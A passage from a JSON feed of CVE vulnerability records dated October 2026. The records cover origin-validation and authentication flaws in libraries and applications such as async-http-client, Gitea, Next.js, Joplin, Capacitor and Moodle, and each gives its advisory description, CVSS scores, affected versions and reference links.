(AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 3.0.14, connection-pool partitioning still omits identity-defining fields for Kerberos, SPNEGO, NTLM, and authenticated proxy connections. Logins without a configured principal, proxy realms, identities sharing a user name, and SOCKS or CONNECT proxy logins can reuse a socket authenticated as a different identity. A later request is then executed under the first identity and can expose that identity's data or authority to another caller. In the affected execution path, SpnegoEngine, NTLM, Kerberos, SPNEGO, SOCKS, and CONNECT control or expose the vulnerable behavior. This issue is fixed in version 3.0.14.","cveId":"CVE-2026-107230","cvssScore":7.4,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","severity":"high","vendor":"Maven","product":"org.asynchttpclient:async-http-client","affectedVersions":["pkg:maven/org.asynchttpclient/async-http-client >= 3.0.0, < 3.0.14","pkg:maven/org.asynchttpclient/async-http-client >= 2.0.0, <= 2.16.1"],"cwes":["CWE-346","CWE-863"],"tags":["nvd","status:received","osv","osv:ghsa-v2j5-22fr-j62r","ecosystem:maven","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/AsyncHttpClient/async-http-client/commit/d3bb4d68b41acf5d3ab7541afa9fdfe7ec3ba054","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.14","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-v2j5-22fr-j62r","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-v2j5-22fr-j62r","type":"advisory","title":"OSV GHSA-v2j5-22fr-j62r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107230","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/AsyncHttpClient/async-http-client","type":"vendor","title":"OSV package"}],"epssScore":0.00188,"epssPercentile":0.07716,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T22:17:03.133Z","addedAt":"2026-10-07T22:39:36.768Z","updatedAt":"2026-10-08T21:05:44.974Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107230","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107230","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-V2J5-22FR-J62R"}]},{"id":"dce5e97f-9ce1-4a80-9aef-58b94f07d04a","slug":"cve-2026-33586","externalId":"CVE-2026-33586","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-33586 — Authenticated users are able to manipulate both the SMTP\nenvelope “Envelope-from” and “From” fields when sending\nemails through OVH mail servers.","description":"Authenticated users are able to manipulate both the SMTP\nenvelope “Envelope-from” and “From” fields when sending\nemails through OVH mail servers.\n\n\n\nDue to OVH's default SPF configuration, which\ncommonly includes include:mx.ovh.com, any authenticated user with a\nvalid OVH email account can send messages that appear to originate from any\nOVH-hosted domains using the default SPF record. Since the SPF policy\nexplicitly authorizes OVH mail servers (mx.ovh.com) to send mail on behalf of\nthese domains, forged messages successfully pass SPF validation despite\nnot being authorized by the impersonated domain owner.","cveId":"CVE-2026-33586","cvssScore":6.3,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-290","CWE-346","CWE-1188"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://docs.ovhcloud.com/en/guides/web-cloud/email-and-collaborative-solutions/troubleshooting/email-rejected-cross-domain-spoofing","type":"advisory","title":"a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}],"epssScore":0.00139,"epssPercentile":0.02813,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T16:17:47.643Z","addedAt":"2026-10-07T16:39:32.781Z","updatedAt":"2026-10-08T23:06:36.659Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33586","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-33586","note":"authoritative record"}]},{"id":"3fca24e0-f0cf-4b91-b4a8-064088e3552e","slug":"cve-2026-101027","externalId":"CVE-2026-101027","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-101027 — When `[migrations] ALLOWED_DOMAINS` was configured, a hostname matching the allow list was accepted without checking its resolved address against t…","description":"When `[migrations] ALLOWED_DOMAINS` was configured, a hostname matching the allow list was accepted without checking its resolved address against the local-network restrictions. A user who can start repository migrations and control the DNS of an allowed hostname could make it resolve to loopback or private addresses and bypass `ALLOW_LOCALNETWORKS = false`, reaching internal services from the Gitea server. Instances without `ALLOWED_DOMAINS` configured are not affected by this specific bypass.","cveId":"CVE-2026-101027","cvssScore":7.7,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-346"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.gitea.com/release-of-28.0.0/","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/pull/39426","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/releases/tag/v28.0.0","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"},{"url":"https://github.com/go-gitea/gitea/security/advisories/GHSA-fqjr-23c8-gg9m","type":"advisory","title":"88ee5874-cf24-4952-aea0-31affedb7ff2"}],"epssScore":0.00167,"epssPercentile":0.05403,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T20:17:08.233Z","addedAt":"2026-10-06T20:39:32.600Z","updatedAt":"2026-10-07T16:39:30.767Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-101027","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-101027","note":"authoritative record"}]},{"id":"41942813-fb39-498e-90ae-53f7c3e1a2ba","slug":"cve-2026-105861","externalId":"CVE-2026-105861","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105861 — Payload is a free and open source headless content management system.","description":"Payload is a free and open source headless content management system. In versions after 3.0.0 and before 3.90.0, authenticated external URL-based upload retrieval can forward authentication data to a redirected destination that was not verified as trusted, potentially exposing a valid session to an unintended recipient. This issue is fixed in version 3.90.0.","cveId":"CVE-2026-105861","cvssScore":7.2,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":"npm","product":"payload","affectedVersions":["pkg:npm/payload >= 3.0.0, < 3.90.0","pkg:npm/payload >= 4.0.0-canary.0, < 4.0.0-canary.34"],"cwes":["CWE-200","CWE-346"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-pj5h-5q6c-3pfx","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/payloadcms/payload/commit/ba5cf6ae20d27a2c15106cb37466419031f86e6d","type":"other","title":"OSV web"},{"url":"https://github.com/payloadcms/payload/releases/tag/v3.90.0","type":"other","title":"OSV web"},{"url":"https://github.com/payloadcms/payload/security/advisories/GHSA-pj5h-5q6c-3pfx","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-pj5h-5q6c-3pfx","type":"advisory","title":"OSV GHSA-pj5h-5q6c-3pfx"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105861","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/payloadcms/payload","type":"vendor","title":"OSV package"}],"epssScore":0.00185,"epssPercentile":0.07428,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T17:17:22.277Z","addedAt":"2026-10-06T17:50:42.624Z","updatedAt":"2026-10-08T00:42:49.541Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105861","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105861","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-PJ5H-5Q6C-3PFX"}]},{"id":"574dfcc3-3c29-458a-a949-036674c5a35c","slug":"cve-2026-105783","externalId":"CVE-2026-105783","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105783 — Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks.","description":"Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Prior to 3.7.13, when Joplin Desktop is running with the opt-in Web Clipper server enabled, the server in packages/lib/ClipperServer.ts sends Access-Control-Allow-Origin: * and allows an arbitrary website to call POST /auth and GET /auth/check because the pairing endpoints do not reject HTTP or HTTPS origins. The desktop confirmation dialog does not identify the requesting origin, so a victim who approves the generic prompt authorizes the attacking page, which then receives the permanent API token. The token provides ongoing read and write access to notes, folders, tags, resources, and master keys. This issue is fixed in version 3.7.13.","cveId":"CVE-2026-105783","cvssScore":8,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-346","CWE-352"],"tags":["nvd","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/laurent22/joplin/commit/27ae5c0d404ee47ad24862cce917dda6eb2930b7","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/laurent22/joplin/pull/16276","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/laurent22/joplin/releases/tag/v3.7.13","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/laurent22/joplin/security/advisories/GHSA-9728-v7ww-mxjv","type":"advisory","title":"security-advisories@github.com"}],"epssScore":0.00145,"epssPercentile":0.03242,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T00:16:33.770Z","addedAt":"2026-10-06T01:50:41.224Z","updatedAt":"2026-10-06T15:50:58.959Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105783","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105783","note":"authoritative record"}]},{"id":"cffcc2f8-62c6-4a7d-ac03-a0eefb2e9537","slug":"cve-2026-105396","externalId":"CVE-2026-105396","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105396 — Heym before v0.0.112 contains a token leakage vulnerability in build_public_base_url() that allows unauthenticated attackers to redirect HITL revie…","description":"Heym before v0.0.112 contains a token leakage vulnerability in build_public_base_url() that allows unauthenticated attackers to redirect HITL review links by spoofing Origin or X-Forwarded-Host headers. Attackers can trigger anonymous workflows with forged headers so reviewer notifications point to attacker domains, capturing capability tokens to submit decisions executed with owner credentials.","cveId":"CVE-2026-105396","cvssScore":5.3,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-346"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/heymrun/heym/security/advisories/GHSA-6rv3-wh25-7pg5","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/heym-before-0.0.112-hitl-review-token-leak-via-spoofable-origin-header","type":"advisory","title":"disclosure@vulncheck.com"}],"epssScore":0.00098,"epssPercentile":0.00734,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T12:17:09.583Z","addedAt":"2026-10-05T13:50:40.958Z","updatedAt":"2026-10-05T17:50:42.789Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105396","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105396","note":"authoritative record"}]},{"id":"5eda9377-4de9-4635-b5c1-456c3f41eec8","slug":"cve-2026-94486","externalId":"CVE-2026-94486","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-94486 — Next.js is a React framework for building full-stack web applications.","description":"Next.js is a React framework for building full-stack web applications. From 16.0.0 until 16.3.8, the next dev development server exposes a Model Context Protocol endpoint without reliably restricting cross-site requests. A malicious website visited by a developer can reach the endpoint and read the project's disk location, source code snippets from error reports, route inventory, and development logs. Production deployments do not serve this endpoint. This issue is fixed in version 16.3.8.","cveId":"CVE-2026-94486","cvssScore":2.3,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"low","vendor":"vercel","product":"next.js","affectedVersions":[">= 16.0.0, < 16.3.8","pkg:npm/next >= 16.0.0, < 16.3.8"],"cwes":["CWE-346"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed","osv","osv:ghsa-39w2-rjm5-chcv","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://github.com/vercel/next.js/commit/2d9f50a409312696145b82b3157aadb6b1fef476"],"references":[{"url":"https://github.com/vercel/next.js/commit/2d9f50a409312696145b82b3157aadb6b1fef476","type":"other","title":"OSV web"},{"url":"https://github.com/vercel/next.js/releases/tag/v16.3.8","type":"other","title":"OSV web"},{"url":"https://github.com/vercel/next.js/security/advisories/GHSA-39w2-rjm5-chcv","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-39w2-rjm5-chcv","type":"advisory","title":"OSV GHSA-39w2-rjm5-chcv"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-94486","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/vercel/next.js","type":"vendor","title":"OSV package"}],"epssScore":0.00114,"epssPercentile":0.01349,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-02T16:16:51.933Z","addedAt":"2026-10-02T17:50:40.793Z","updatedAt":"2026-10-08T00:42:49.787Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-94486","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-94486","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-39W2-RJM5-CHCV"}]},{"id":"830b0516-84a3-4796-903c-ee092264e497","slug":"cve-2026-94485","externalId":"CVE-2026-94485","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-94485 — Next.js is a React framework for building full-stack web applications.","description":"Next.js is a React framework for building full-stack web applications. From 16.0.0 until 16.3.8, the `next dev` development server exposes a Model Context Protocol endpoint without reliably restricting cross-site requests. A malicious website visited by a developer can reach the endpoint and read the project's disk location, source code snippets from error reports, route inventory, and development logs. Production deployments do not serve this endpoint. This issue is fixed in version 16.3.8.","cveId":"CVE-2026-94485","cvssScore":6.3,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":"vercel","product":"next.js","affectedVersions":[">= 16.0.0, < 16.3.8","pkg:npm/next >= 16.0.0, < 16.3.8"],"cwes":["CWE-346"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed","osv","osv:ghsa-f87g-xv8r-7p7x","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://github.com/vercel/next.js/commit/2d9f50a409312696145b82b3157aadb6b1fef476"],"references":[{"url":"https://github.com/vercel/next.js/commit/2d9f50a409312696145b82b3157aadb6b1fef476","type":"other","title":"OSV web"},{"url":"https://github.com/vercel/next.js/releases/tag/v16.3.8","type":"other","title":"OSV web"},{"url":"https://github.com/vercel/next.js/security/advisories/GHSA-f87g-xv8r-7p7x","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-f87g-xv8r-7p7x","type":"advisory","title":"OSV GHSA-f87g-xv8r-7p7x"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-94485","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/vercel/next.js","type":"vendor","title":"OSV package"}],"epssScore":0.00145,"epssPercentile":0.03279,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-02T16:16:51.777Z","addedAt":"2026-10-02T17:50:40.788Z","updatedAt":"2026-10-08T00:42:49.630Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-94485","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-94485","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-F87G-XV8R-7P7X"}]},{"id":"f9df8c2d-ba7f-4a50-b095-2b0d35075ec1","slug":"cve-2026-104056","externalId":"CVE-2026-104056","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-104056 — Authlib version 1.7.2 and below contains a vulnerability where discovery JSON metadata is cached without validation or issuer-origin binding.","description":"Authlib version 1.7.2 and below contains a vulnerability where discovery JSON metadata is cached without validation or issuer-origin binding. This allows a poisoned discovery response to replace all endpoint values with attacker-controlled values rather than endpoint URLs that share the origin of the configured server metadata URL.","cveId":"CVE-2026-104056","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-345","CWE-346","CWE-829"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://uziii2208.github.io/post/cve-2026-104056/","type":"advisory","title":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}],"epssScore":0.00167,"epssPercentile":0.05481,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-01T19:17:19.033Z","addedAt":"2026-10-01T19:50:41.143Z","updatedAt":"2026-10-05T19:50:42.258Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104056","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104056","note":"authoritative record"}]},{"id":"92895c26-c082-4cc6-bb78-7586c3635f00","slug":"cve-2026-103922","externalId":"CVE-2026-103922","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-103922 — Capacitor is a cross-platform native runtime for web applications.","description":"Capacitor is a cross-platform native runtime for web applications. From 6.0.0 until 6.2.2, 7.6.9, 8.3.5, 8.4.3, and 8.5.1, the Android and iOS WebView navigation guard validates a target URL's host and scheme but not its path, allowing a victim who activates an untrusted link to navigate a frame to /_capacitor_http_interceptor_. The native proxy can fetch an attacker-selected URL and return the response as a document at the application's own origin, allowing script in that response to access same-origin storage, cookies, and registered Capacitor plugin capabilities. Applications remain affected when CapacitorHttp is disabled because affected releases serve the proxy path regardless of that setting. This issue is fixed in versions 6.2.2, 7.6.9, 8.3.5, 8.4.3, and 8.5.1.","cveId":"CVE-2026-103922","cvssScore":9.3,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N","severity":"critical","vendor":"npm","product":"@capacitor/android","affectedVersions":["pkg:npm/%40capacitor/android >= 6.0.0, < 6.2.2","pkg:npm/%40capacitor/android >= 7.0.0, < 7.6.9","pkg:npm/%40capacitor/ios >= 6.0.0, < 6.2.2","pkg:npm/%40capacitor/ios >= 7.0.0, < 7.6.9","pkg:swift/github.com/ionic-team/capacitor-swift-pm >= 6.0.0, < 6.2.2","pkg:swift/github.com/ionic-team/capacitor-swift-pm >= 7.0.0, < 7.6.9","pkg:maven/com.capacitorjs/core >= 6.0.0, < 6.2.2","pkg:maven/com.capacitorjs/core >= 7.0.0, < 7.6.9","pkg:npm/%40capacitor/android >= 8.5.0, < 8.5.1","pkg:npm/%40capacitor/ios >= 8.5.0, < 8.5.1","pkg:swift/github.com/ionic-team/capacitor-swift-pm >= 8.5.0, < 8.5.1","pkg:maven/com.capacitorjs/core >= 8.5.0, < 8.5.1","pkg:maven/com.capacitorjs/core >= 8.3.5, < 8.4.3","pkg:npm/%40capacitor/android >= 8.3.5, < 8.4.3","pkg:npm/%40capacitor/ios >= 8.3.5, < 8.4.3","pkg:swift/github.com/ionic-team/capacitor-swift-pm >= 8.3.5, < 8.4.3","pkg:swift/github.com/ionic-team/capacitor-swift-pm >= 8.0.0, <= 8.3.4","pkg:maven/com.capacitorjs/core >= 8.0.0, <= 8.3.4","pkg:npm/%40capacitor/android >= 8.0.0, <= 8.3.4","pkg:npm/%40capacitor/ios >= 8.0.0, <= 8.3.4"],"cwes":["CWE-346","CWE-441"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-rvm3-566m-v7fv","ecosystem:npm","ecosystem:swifturl","ecosystem:maven"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/ionic-team/capacitor/commit/430356a91e1419fc66862dc09835081aa501677e","type":"other","title":"OSV web"},{"url":"https://github.com/ionic-team/capacitor/commit/80b6c5e81d062e1e158914040f49e044d95b7ccb","type":"other","title":"OSV web"},{"url":"https://github.com/ionic-team/capacitor/commit/85ccc44151fdd5ae5e0d806d875766ef4b84ad5d","type":"other","title":"OSV web"},{"url":"https://github.com/ionic-team/capacitor/commit/af9a287fef45f0ac68ce640cb42fed2d06b0f1b4","type":"other","title":"OSV web"},{"url":"https://github.com/ionic-team/capacitor/commit/d5e3170ba0ff155fc542b7e6d16cff5201406540","type":"other","title":"OSV web"},{"url":"https://github.com/ionic-team/capacitor/commit/ee586ae680887ba99d066616f976db149542d922","type":"other","title":"OSV web"},{"url":"https://github.com/ionic-team/capacitor/releases/tag/8.5.1","type":"other","title":"OSV web"},{"url":"https://github.com/ionic-team/capacitor/security/advisories/GHSA-rvm3-566m-v7fv","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-rvm3-566m-v7fv","type":"advisory","title":"OSV GHSA-rvm3-566m-v7fv"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-103922","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/ionic-team/capacitor/commit/745b5f805bf77bc6463977cc7d718cd9de44ccbc","type":"other","title":"OSV web"},{"url":"https://github.com/ionic-team/capacitor","type":"vendor","title":"OSV package"}],"epssScore":0.00213,"epssPercentile":0.10633,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-01T18:17:12.840Z","addedAt":"2026-10-01T19:50:41.041Z","updatedAt":"2026-10-06T01:54:27.398Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-103922","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-103922","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-RVM3-566M-V7FV"}]},{"id":"80145c02-f526-4483-8b5e-b69d24a859db","slug":"cve-2026-102588","externalId":"CVE-2026-102588","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-102588 — A flaw was found in Moodle.","description":"A flaw was found in Moodle. The XML grade import feature lacks proper Cross-Site Request Forgery (CSRF) token validation. By tricking an authenticated user with grade management permissions into visiting a malicious webpage, an attacker can trigger unauthorized requests on the victim's behalf. This flaw allows a remote attacker to set or overwrite student grades without authorization.","cveId":"CVE-2026-102588","cvssScore":6.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N","severity":"medium","vendor":"moodle","product":"moodle","affectedVersions":["< 4.5.13",">= 5.0.0, < 5.0.9",">= 5.1.0, < 5.1.6",">= 5.2.0, < 5.2.2"],"cwes":["CWE-346"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-84545"],"references":[{"url":"http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-84545","type":"patch","title":"Patch"},{"url":"https://access.redhat.com/security/cve/CVE-2026-102588","type":"advisory","title":"Third Party Advisory"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2543643","type":"advisory","title":"Issue Tracking"},{"url":"https://moodle.org/mod/forum/discuss.php?d=482507","type":"vendor","title":"Vendor Advisory"}],"epssScore":0.00198,"epssPercentile":0.08798,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-30T09:17:16.163Z","addedAt":"2026-09-30T09:50:39.035Z","updatedAt":"2026-10-01T17:50:42.253Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-102588","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-102588","note":"authoritative record"}]},{"id":"a262eea6-224f-4c17-806e-15e1ce154f38","slug":"cve-2026-102878","externalId":"CVE-2026-102878","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-102878 — mcp-chrome-bridge through 1.0.31 contains an origin validation error in the native-server HTTP API that allows attackers to bypass CORS restrictions.","description":"mcp-chrome-bridge through 1.0.31 contains an origin validation error in the native-server HTTP API that allows attackers to bypass CORS restrictions. Attackers can craft malicious web pages that make cross-origin requests to the local server and invoke browser automation tools including script execution, page content reading, and screenshot capture.","cveId":"CVE-2026-102878","cvssScore":8.6,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-346"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/hangwin/mcp-chrome","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/hangwin/mcp-chrome/blob/v1.0.0/app/native-server/src/server/index.ts","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/hangwin/mcp-chrome/issues/384","type":"advisory","title":"134c704f-9b21-4f2e-91b3-4a467353bcc0"},{"url":"https://www.vulncheck.com/advisories/mcp-chrome-bridge-